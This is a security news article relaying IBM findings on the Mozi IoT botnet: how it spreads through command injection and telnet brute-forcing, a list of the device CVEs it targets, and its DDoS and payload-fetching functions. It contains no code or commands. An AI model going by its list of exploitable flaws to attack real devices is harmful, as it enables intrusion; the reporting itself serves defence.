Mozi Botnet Accounted for Majority of IoT Traffic: IBM

Mozi, a relatively new botnet, has fueled a significant increase in Internet of Things (IoT) botnet activity, IBM reported this week.

Showing code overlaps with Mirai and its variants and reusing Gafgyt code, Mozi has been highly active over the past year, and it accounted for 90% of the IoT network traffic observed between October 2019 and June 2020, although it did not attempt to remove competitors from compromised systems, IBM researchers say.

The large increase in IoT attacks, however, might also be the result of a higher number of IoT devices being available worldwide, thus expanding the attack surface. At the moment, IBM notes, there are around 31 billion IoT devices worldwide, with approximately 127 devices being deployed each second.

IBM suggests that Mozi’s success is based on the use of command injection (CMDi) attacks, which rely on misconfigurations in IoT devices. The increased use of IoT and poor configuration protocols are believed to be responsible for the spike, along with the increase in remote work due to COVID-19.

Almost all of the observed attacks targeting IoT devices were employing CMDi for initial access. Mozi leverages CMDi by using a “wget” shell command and then tampering with permissions to facilitate the attackers’ interaction with the affected system.

On vulnerable devices, a file called “mozi.a” was downloaded and then executed on MIPS architecture. The attack targets machines running reduced instruction set computer (RISC) architecture — MIPS is a RISC instruction set architecture — and can provide an adversary with the ability to modify the firmware to plant additional malware.

Mozi targets many vulnerabilities for infection purposes: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 / CVE-2018-10562 (GPON Routers), CVE-2014-8361 (Realtek SDK), CVE-2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link Devices), Eir D1000 wireless router command injection, Netgear setup.cgi unauthenticated RCE, MVPower DVR command execution, D-Link UPnP SOAP command execution, and RCE impacting multiple CCTV-DVR vendors.

The threat, which leverages an infrastructure primarily located in China (84%), is also capable of brute-forcing telnet credentials and uses a hardcoded list for that.

“The Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can spread via IoT device exploits and weak telnet passwords,” IBM says.

The malware uses ECDSA384 (elliptic curve digital signature algorithm 384) to check its integrity and contains a set of hardcoded DHT public nodes that can be leveraged to join the P2P network.

The botnet can be used for launching distributed denial of service (DDoS) attacks (HTTP, TCP, UDP), can launch command execution attacks, can fetch and execute additional payloads, and can also gather bot information.

“As newer botnet groups, such as Mozi, ramp up operations and overall IoT activity surges, organizations using IoT devices need to be cognizant of the evolving threat. IBM is increasingly seeing enterprise IoT devices under fire from attackers. Command injection remains the primary infection vector of choice for threat actors, reiterating how important it is to change default device settings and use effective penetration testing to find and fix gaps in the armor,” IBM concludes.

Related: FritzFrog Botnet Uses Proprietary P2P Protocol

Related: New ‘Kaiji’ Botnet Attacks Linux, IoT Devices via SSH Brute Force

Related: High-Wattage IoT Botnets Can Manipulate Energy Market: Researchers

view counter

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Don't forget to share

You may also like...

Leave a Reply

Your email address will not be published.